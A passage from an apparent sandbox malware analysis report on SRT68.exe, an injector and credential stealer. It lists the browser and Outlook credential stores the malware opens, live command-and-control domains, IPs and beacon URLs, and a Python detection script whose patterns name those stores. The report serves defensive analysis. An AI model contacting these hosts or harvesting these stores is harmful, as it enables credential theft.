                Source: SRT68.exe, VdxisCThGA.exe, 00000003.00000002.3835088875.0000000001581000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000000.1410767579.0000000001580000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1569922622.0000000001411000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: VdxisCThGA.exe, 00000003.00000002.3835088875.0000000001581000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000000.1410767579.0000000001580000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1569922622.0000000001411000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: VdxisCThGA.exe, 00000003.00000002.3835088875.0000000001581000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000000.1410767579.0000000001580000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1569922622.0000000001411000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
                Source: VdxisCThGA.exe, 00000003.00000002.3835088875.0000000001581000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000000.1410767579.0000000001580000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1569922622.0000000001411000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SRT68.exe Code function: 0_2_00FC862B cpuid
                Source: C:\Users\user\Desktop\SRT68.exe Code function: 0_2_00FD4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\SRT68.exe Code function: 0_2_00FE1E06 GetUserNameW
                Source: C:\Users\user\Desktop\SRT68.exe Code function: 0_2_00FD3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\SRT68.exe Code function: 0_2_00FA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3834195003.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3833825431.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3835727980.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1489414299.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1488635297.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3835430269.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1489460916.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\odbcconf.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\odbcconf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\odbcconf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\odbcconf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\odbcconf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\odbcconf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\odbcconf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\odbcconf.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\odbcconf.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: SRT68.exe | Binary or memory string: WIN_81
Source: SRT68.exe | Binary or memory string: WIN_XP
Source: SRT68.exe | Binary or memory string: WIN_XPe
Source: SRT68.exe | Binary or memory string: WIN_VISTA
Source: SRT68.exe | Binary or memory string: WIN_7
Source: SRT68.exe | Binary or memory string: WIN_8
Source: SRT68.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
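The file and registry accesses listed above are the whole of the "harvest browser information" and "steal Mail credentials" behaviour: a process that is neither a browser nor a mail client opens the Chromium credential stores (Login Data, Web Data, Cookies, Local State under "User Data") and the Outlook MAPI profile key. The script below is an added example, not part of the Joe Sandbox report, showing that rule run over constructed sample events. The "process|operation|target" event format is an assumption made for the example; the process name, file paths and registry key are the ones the report lists, with two benign accesses and one unrelated file added for contrast.

```python
import re
from typing import NamedTuple

# Constructed sample events in a "process|operation|target" format. The
# format itself is an assumption made for this example; the process,
# file paths and registry key are the ones listed in the report above,
# plus two benign accesses and one unrelated file for contrast.
SAMPLE_EVENTS = """\
C:\\Windows\\SysWOW64\\odbcconf.exe|FileOpen|C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data
C:\\Windows\\SysWOW64\\odbcconf.exe|FileOpen|C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies
C:\\Windows\\SysWOW64\\odbcconf.exe|FileOpen|C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data
C:\\Windows\\SysWOW64\\odbcconf.exe|RegOpenKey|HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\
C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|FileOpen|C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data
C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE|RegOpenKey|HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\
C:\\Windows\\SysWOW64\\odbcconf.exe|FileOpen|C:\\Users\\user\\AppData\\Local\\Temp\\settings.rsp
"""


class Finding(NamedTuple):
    process: str
    operation: str
    target: str
    rule: str


# Chromium-based browsers keep saved logins, autofill data, cookies and the
# DPAPI-wrapped master key below "<...>\User Data\". Any of these files
# being opened by something other than the browser is the behaviour the
# report attributes to odbcconf.exe.
CHROMIUM_STORE = re.compile(
    r"\\User Data\\(?:[^\\]+\\)*(?:Login Data|Web Data|Cookies|Local State)$",
    re.IGNORECASE,
)
# MAPI profile key that mail-credential stealers enumerate
# (the exact key opened by odbcconf.exe in the report).
OUTLOOK_PROFILES = re.compile(
    r"^HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
    r"\\Windows Messaging Subsystem\\Profiles\\",
    re.IGNORECASE,
)

# Processes that legitimately touch these artefacts. Keep the list short and
# explicit; add your own backup or sync agents by name, not by wildcard.
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "chromium.exe", "opera.exe", "vivaldi.exe"}
MAIL_CLIENTS = {"outlook.exe"}


def image_name(path: str) -> str:
    """Lower-cased executable name from a full image path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line: str):
    """Return (process, operation, target) or None for a malformed line."""
    parts = line.rstrip("\r\n").split("|", 2)
    if len(parts) != 3:
        return None
    return tuple(parts)


def detect(lines):
    """Flag credential-store access by processes outside the allow-lists."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        process, operation, target = ev
        name = image_name(process)
        if CHROMIUM_STORE.search(target) and name not in BROWSERS:
            findings.append(Finding(process, operation, target, "browser_credential_store_access"))
        elif OUTLOOK_PROFILES.match(target) and name not in MAIL_CLIENTS:
            findings.append(Finding(process, operation, target, "outlook_profile_key_access"))
    return findings


def summarize(findings):
    """Group findings by process so one stealer run becomes one alert."""
    out = {}
    for f in findings:
        out.setdefault(f.process, set()).add(f.rule)
    return out


if __name__ == "__main__":
    for proc, rules in summarize(detect(SAMPLE_EVENTS.splitlines())).items():
        print(f"{proc}: {', '.join(sorted(rules))}")
```

The allow-list is keyed on the image name only; in production, pair it with the signer or full path, since a stealer can just as easily be copied to chrome.exe as be injected into odbcconf.exe.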

                Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3834195003.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3833825431.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3835727980.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1489414299.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1488635297.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3835430269.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1489460916.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\SRT68.exe | Code function: 0_2_01016283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_01016283
Source: C:\Users\user\Desktop\SRT68.exe | Code function: 0_2_01016747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_01016747
MITRE ATT&CK Matrix (one line per tactic, techniques in the matrix's row order; the number before a technique is the count shown in the matrix cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 251 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID 1568958, sample SRT68.exe, start date 05/12/2024, architecture WINDOWS, score 100)

Start node: DNS/IP www.avalanchefi.xyz, www.8600228.xyz and 19 other IPs or domains. Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; 5 other signatures. www.8600228.xyz: Performs DNS queries to domains with low reputation.
SRT68.exe (started). Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 2 other signatures.
  svchost.exe (started by SRT68.exe). Signatures: Maps a DLL or memory area into another process.
    VdxisCThGA.exe (injected by svchost.exe). Signatures: Found direct / indirect Syscall (likely to bypass EDR).
      odbcconf.exe (started by VdxisCThGA.exe). Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures.
        VdxisCThGA.exe (injected by odbcconf.exe). DNS/IP: officinadelpasso.shop 195.110.124.133, ports 49718, 49719, 49720 (REGISTER-ASIT, Italy); appsolucao.shop 84.32.84.32, ports 49726, 49727, 49728 (NTT-LT-ASLT, Lithuania); 11 other IPs or domains. Signatures: Found direct / indirect Syscall (likely to bypass EDR).
        firefox.exe (started by odbcconf.exe).

Source | Detection | Scanner | Label
SRT68.exe | 50% | ReversingLabs | Win32.Trojan.AutoitInject
SRT68.exe | 33% | Virustotal |
SRT68.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner
d48dk.top | 0% | Virustotal
www.avalanchefi.xyz | 0% | Virustotal
appsolucao.shop | 10% | Virustotal
www.cg19g5.pro | 0% | Virustotal
Source | Detection | Scanner | Label
http://www.liveplah.live/2bf0/ | 0% | Avira URL Cloud | safe
http://vpnto.net | 0% | Avira URL Cloud | safe
http://www.beythome.online/nlsy/?t8=erepa0aHg&dpy4vDKP=UqZJjljcaDHPU5MJF3/VZj5j3teXWnZaRQ/xhIwYknb6hebLg3nkkQRCQY+bdc+EMOTwSi3/zIBCbkzFO/JkBIXeM3N7PUFbamj23ddqQuGG3w5lM7wcBAQnAQO0NkBIlw== | 0% | Avira URL Cloud | safe
http://www.officinadelpasso.shop/io9k/ | 0% | Avira URL Cloud | safe
https://www.bfyer.com?id=84562 | 0% | Avira URL Cloud | safe
https://whois7.ru | 0% | Avira URL Cloud | safe
http://www.kuyubak.online/0y4f/?dpy4vDKP=W6j3FlXHgKFEzHHMzzUr6etYN8emjbRukUVUnXhTbXIwJxcnvHf7UERkoV23CGr7af9sT9Hr2IGU+EAvarnr8GKkbF3NBPjLy540YzR1+jWjLh+mVAm2mD8qugDIDXe/9Q==&t8=erepa0aHg | 0% | Avira URL Cloud | safe
https://ipaddress.ru | 0% | Avira URL Cloud | safe
http://www.appsolucao.shop/qize/ | 100% | Avira URL Cloud | malware
http://www.vpnto.net/v3s3/ | 0% | Avira URL Cloud | safe
http://www.d48dk.top/e60d/?dpy4vDKP=Lh8IZlyEUGMyHNz6uzMKRKcg9kIQklaGIJ5xEwxQigTlOIYbC6hIWaFGebeUYVIRA2Z0HVQvNj5Y3e9+xtlK2GGMMiSOyWHkKpdyqmIJ1jPdVOmhO/2pbDJYfwa6foHFGQ==&t8=erepa0aHg | 0% | Avira URL Cloud | safe
http://www.kuyubak.online/0y4f/ | 0% | Avira URL Cloud | safe
http://www.cg19g5.pro/n6mr/?t8=erepa0aHg&dpy4vDKP=GPIQ2z/B9X5fmZ3sRaU3lKIswCsVIIIgTgvk25ZssZv4dO1E/pYASyJvrlPo9cI5+by0L1E1CSBOcK+TEfCDQZVXcl76FOzKxgwJ6LhevK7HHB5B6PysFKjeMQUdEOWzug== | 0% | Avira URL Cloud | safe
http://www.amayavp.xyz/pxvi/ | 100% | Avira URL Cloud | malware
http://www.i7.ru/ | 0% | Avira URL Cloud | safe
http://www.acond-22-mvr.click/9qaj/ | 0% | Avira URL Cloud | safe
http://www.remedies.pro/p9ni/ | 0% | Avira URL Cloud | safe
http://www.fantastica.digital/5srj/ | 0% | Avira URL Cloud | safe
http://www.vpnto.net/v3s3/?dpy4vDKP=tyn9Xf4Tiyk8OMwOE2/3W7I6SfC4Fy+XuF+V6x+u+aHyo7NExtCHdgYtt4f9rPCqzYPXesK+A0TEw6Z3hMmMu6en0oemB8DST7EgTGpjLeWNMzHlOHw+YKqeTj7VW+MXtw==&t8=erepa0aHg | 0% | Avira URL Cloud | safe
http://www.liveplah.live/2bf0/?t8=erepa0aHg&dpy4vDKP=3OqiePSgEWDnichCzykulC99ilyMR42c9dvyS4flA69FHugFqZCdTRqO1AzR0oWb7uhSQNyMOpAGAvI21ypqYHnlFtq0XISmUzcVnvfhkgBzm7iBPlHVCbyp9E6MDtQhfw== | 0% | Avira URL Cloud | safe
https://myssl.ru | 0% | Avira URL Cloud | safe
http://www.fantastica.digital | 0% | Avira URL Cloud | safe
http://www.acond-22-mvr.click/9qaj/?t8=erepa0aHg&dpy4vDKP=caF4EcuODBgQ1i6gPG20EU6tn7+OYu3Aff5fuR7QYIa9oDxgmbqLqfUGksVeBOzK8iLLl5bd6dj0pUPLQhqCx4w42vP06UsMAFCvdgslU2ProEjwrqN2bmfrxuo1f5qv1g== | 0% | Avira URL Cloud | safe
https://i7.ru | 0% | Avira URL Cloud | safe
https://whois7.ru/?q=vpnto.net | 0% | Avira URL Cloud | safe
http://www.cg19g5.pro/n6mr/ | 0% | Avira URL Cloud | safe
http://www.avalanchefi.xyz/vxa5/ | 0% | Avira URL Cloud | safe
http://www.avalanchefi.xyz/vxa5/?t8=erepa0aHg&dpy4vDKP=3m9BMPCo28gPx+sVgKXwS8IlJOXqcXmGTC3iha7DeRIyHWQ2U5yIEoIaKrBYwlKWmJAMybrbkv8ugG4OPEpxsFgkF6ZwXtqNiPQ58hDKvZiQtRpFO+ljJVXyg6SqNh6RKQ== | 0% | Avira URL Cloud | safe
https://i7.ru/domains/#domreg | 0% | Avira URL Cloud | safe
https://i7.ru/domains/ | 0% | Avira URL Cloud | safe
http://www.beythome.online/nlsy/ | 0% | Avira URL Cloud | safe
http://www.remedies.pro/p9ni/?t8=erepa0aHg&dpy4vDKP=VjnXICZu3b90kzFmF4J2uYgo+ABl9xxhLCOJTOlpSNjw/vdOvc7wLSvxn4RRbS+FrV68iTOjdPHrV90Y9IBOFprvjVYeP8iCfChMm+NPXe6TXixkrzJc8c2KgZmEDZ5g3g== | 0% | Avira URL Cloud | safe
http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME+5G/BY7+mMEXOiclzjhJwCZdUbRes612uS6KmZhj3zV5mWNPQZslZbRtI4SShrzI4pEvHSsV/RdVS1ssPCnJ48fYcpfjGOVa6yb/Zo31Sw==&t8=erepa0aHg | 100% | Avira URL Cloud | malware
http://www.8600228.xyz/1aqh/ | 0% | Avira URL Cloud | safe
https://proxyspot.com | 0% | Avira URL Cloud | safe
http://www.appsolucao.shop/qize/?dpy4vDKP=NRtAy8C1VD75jnw1HAYEMp1WIgG9E9qKUxnpBBxcw4/fMmuOK8aE1wx7hBeLP0HeQaV2gm8tylKSVkOWM4FJZ7IkG8aAGL63BqOI2MJdjYMIxaXVRLxlKq88LSTtWskGyQ==&t8=erepa0aHg | 100% | Avira URL Cloud | malware
http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME | 100% | Avira URL Cloud | malware
https://job.i7.ru | 0% | Avira URL Cloud | safe
http://www.8600228.xyz/1aqh/?dpy4vDKP=MK/FGhogQMFGTubZtl0nY6hc/pJIZCUp1R0gjdvUtYSP9EvSbL3Gx6E3faPb4gMH2ieWspJSGv1JG+kjFz+FowS8MPOB8ARjyMg7sZyMJw5GniWcBKwlZHjyk+h59baaXg==&t8=erepa0aHg | 0% | Avira URL Cloud | safe
http://www.d48dk.top/e60d/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Reputation
www.remedies.pro | 13.248.169.48 | true | false | high
d48dk.top | 154.23.184.207 | true | true | unknown
www.avalanchefi.xyz | 13.248.169.48 | true | true | unknown
www.amayavp.xyz | 185.27.134.144 | true | false | high
appsolucao.shop | 84.32.84.32 | true | true | unknown
www.cg19g5.pro | 154.88.22.105 | true | true | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | false | high
www.fantastica.digital | 194.58.112.174 | true | false | unknown
bagatowcannabis.cloud | 81.2.196.19 | true | true | unknown
www.acond-22-mvr.click | 199.59.243.227 | true | false | high
www.liveplah.live | 209.74.77.107 | true | true | unknown
officinadelpasso.shop | 195.110.124.133 | true | true | unknown
www.vpnto.net | 91.226.30.3 | true | true | unknown
www.8600228.xyz | 103.249.106.91 | true | true | unknown
www.officinadelpasso.shop | unknown | unknown | false | unknown
www.d48dk.top | unknown | unknown | false | unknown
www.beythome.online | unknown | unknown | false | unknown
www.kuyubak.online | unknown | unknown | false | unknown
www.bagatowcannabis.cloud | unknown | unknown | false | unknown
www.appsolucao.shop | unknown | unknown | true | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.liveplah.live/2bf0/ | true | Avira URL Cloud: safe | unknown
http://www.appsolucao.shop/qize/ | true | Avira URL Cloud: malware | unknown
http://www.kuyubak.online/0y4f/?dpy4vDKP=W6j3FlXHgKFEzHHMzzUr6etYN8emjbRukUVUnXhTbXIwJxcnvHf7UERkoV23CGr7af9sT9Hr2IGU+EAvarnr8GKkbF3NBPjLy540YzR1+jWjLh+mVAm2mD8qugDIDXe/9Q==&t8=erepa0aHg | true | Avira URL Cloud: safe | unknown
http://www.beythome.online/nlsy/?t8=erepa0aHg&dpy4vDKP=UqZJjljcaDHPU5MJF3/VZj5j3teXWnZaRQ/xhIwYknb6hebLg3nkkQRCQY+bdc+EMOTwSi3/zIBCbkzFO/JkBIXeM3N7PUFbamj23ddqQuGG3w5lM7wcBAQnAQO0NkBIlw== | true | Avira URL Cloud: safe | unknown
http://www.vpnto.net/v3s3/ | true | Avira URL Cloud: safe | unknown
http://www.officinadelpasso.shop/io9k/ | true | Avira URL Cloud: safe | unknown
http://www.cg19g5.pro/n6mr/?t8=erepa0aHg&dpy4vDKP=GPIQ2z/B9X5fmZ3sRaU3lKIswCsVIIIgTgvk25ZssZv4dO1E/pYASyJvrlPo9cI5+by0L1E1CSBOcK+TEfCDQZVXcl76FOzKxgwJ6LhevK7HHB5B6PysFKjeMQUdEOWzug== | true | Avira URL Cloud: safe | unknown
http://www.d48dk.top/e60d/?dpy4vDKP=Lh8IZlyEUGMyHNz6uzMKRKcg9kIQklaGIJ5xEwxQigTlOIYbC6hIWaFGebeUYVIRA2Z0HVQvNj5Y3e9+xtlK2GGMMiSOyWHkKpdyqmIJ1jPdVOmhO/2pbDJYfwa6foHFGQ==&t8=erepa0aHg | true | Avira URL Cloud: safe | unknown
http://www.remedies.pro/p9ni/ | true | Avira URL Cloud: safe | unknown
http://www.kuyubak.online/0y4f/ | true | Avira URL Cloud: safe | unknown
http://www.liveplah.live/2bf0/?t8=erepa0aHg&dpy4vDKP=3OqiePSgEWDnichCzykulC99ilyMR42c9dvyS4flA69FHugFqZCdTRqO1AzR0oWb7uhSQNyMOpAGAvI21ypqYHnlFtq0XISmUzcVnvfhkgBzm7iBPlHVCbyp9E6MDtQhfw== | true | Avira URL Cloud: safe | unknown
http://www.fantastica.digital/5srj/ | false | Avira URL Cloud: safe | unknown
http://www.vpnto.net/v3s3/?dpy4vDKP=tyn9Xf4Tiyk8OMwOE2/3W7I6SfC4Fy+XuF+V6x+u+aHyo7NExtCHdgYtt4f9rPCqzYPXesK+A0TEw6Z3hMmMu6en0oemB8DST7EgTGpjLeWNMzHlOHw+YKqeTj7VW+MXtw==&t8=erepa0aHg | true | Avira URL Cloud: safe | unknown
http://www.amayavp.xyz/pxvi/ | true | Avira URL Cloud: malware | unknown
http://www.acond-22-mvr.click/9qaj/ | true | Avira URL Cloud: safe | unknown
http://www.acond-22-mvr.click/9qaj/?t8=erepa0aHg&dpy4vDKP=caF4EcuODBgQ1i6gPG20EU6tn7+OYu3Aff5fuR7QYIa9oDxgmbqLqfUGksVeBOzK8iLLl5bd6dj0pUPLQhqCx4w42vP06UsMAFCvdgslU2ProEjwrqN2bmfrxuo1f5qv1g== | true | Avira URL Cloud: safe | unknown
http://www.cg19g5.pro/n6mr/ | true | Avira URL Cloud: safe | unknown
http://www.avalanchefi.xyz/vxa5/ | true | Avira URL Cloud: safe | unknown
http://www.avalanchefi.xyz/vxa5/?t8=erepa0aHg&dpy4vDKP=3m9BMPCo28gPx+sVgKXwS8IlJOXqcXmGTC3iha7DeRIyHWQ2U5yIEoIaKrBYwlKWmJAMybrbkv8ugG4OPEpxsFgkF6ZwXtqNiPQ58hDKvZiQtRpFO+ljJVXyg6SqNh6RKQ== | true | Avira URL Cloud: safe | unknown
http://www.remedies.pro/p9ni/?t8=erepa0aHg&dpy4vDKP=VjnXICZu3b90kzFmF4J2uYgo+ABl9xxhLCOJTOlpSNjw/vdOvc7wLSvxn4RRbS+FrV68iTOjdPHrV90Y9IBOFprvjVYeP8iCfChMm+NPXe6TXixkrzJc8c2KgZmEDZ5g3g== | true | Avira URL Cloud: safe | unknown
http://www.beythome.online/nlsy/ | true | Avira URL Cloud: safe | unknown
http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME+5G/BY7+mMEXOiclzjhJwCZdUbRes612uS6KmZhj3zV5mWNPQZslZbRtI4SShrzI4pEvHSsV/RdVS1ssPCnJ48fYcpfjGOVa6yb/Zo31Sw==&t8=erepa0aHg | true | Avira URL Cloud: malware | unknown
http://www.8600228.xyz/1aqh/ | true | Avira URL Cloud: safe | unknown
http://www.appsolucao.shop/qize/?dpy4vDKP=NRtAy8C1VD75jnw1HAYEMp1WIgG9E9qKUxnpBBxcw4/fMmuOK8aE1wx7hBeLP0HeQaV2gm8tylKSVkOWM4FJZ7IkG8aAGL63BqOI2MJdjYMIxaXVRLxlKq88LSTtWskGyQ==&t8=erepa0aHg | true | Avira URL Cloud: malware | unknown
http://www.8600228.xyz/1aqh/?dpy4vDKP=MK/FGhogQMFGTubZtl0nY6hc/pJIZCUp1R0gjdvUtYSP9EvSbL3Gx6E3faPb4gMH2ieWspJSGv1JG+kjFz+FowS8MPOB8ARjyMg7sZyMJw5GniWcBKwlZHjyk+h59baaXg==&t8=erepa0aHg | true | Avira URL Cloud: safe | unknown
http://www.d48dk.top/e60d/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ipaddress.ru | odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://whois7.ru | odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://vpnto.net | odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
